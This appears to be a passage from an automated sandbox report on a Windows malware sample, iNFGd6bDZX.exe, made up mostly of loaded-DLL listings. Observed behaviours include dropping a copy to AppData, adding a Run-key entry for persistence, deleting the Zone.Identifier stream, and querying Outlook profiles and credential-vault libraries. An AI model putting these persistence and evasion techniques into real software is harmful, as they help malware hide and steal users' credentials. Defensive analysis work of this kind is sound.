                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: iconcodecservice.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: iNFGd6bDZX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: iNFGd6bDZX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C739E9 push 8B92EB7Ah; ret 0_2_00C739F3
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 0_2_00C77E71 push ebp; retf 0_2_00C77ED5
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 5_2_01960C55 push edi; retf 5_2_01960C7A
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 7_2_016439E9 push 8B92EB7Ah; ret 7_2_016439F3
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 10_2_0666B0D1 push es; ret 10_2_0666B0E0
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB22C8 push ds; retf 12_2_00CB22CA
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB228D push ds; retf 12_2_00CB2296
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB2298 push ds; retf 12_2_00CB22AE
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB2264 push ds; retf 12_2_00CB226E
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB39E9 push 8B92EB7Ah; ret 12_2_00CB39F3
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 12_2_00CB7E71 push ebp; iretd 12_2_00CB7ED5
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067EF730 push es; ret 14_2_067EF740
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 14_2_067EB0D1 push es; ret 14_2_067EB0E0
                      Source: iNFGd6bDZX.exeStatic PE information: section name: .text entropy: 7.759793629264103
                      Source: newapp.exe.5.drStatic PE information: section name: .text entropy: 7.759793629264103
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile created: C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to dropped file
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newappJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
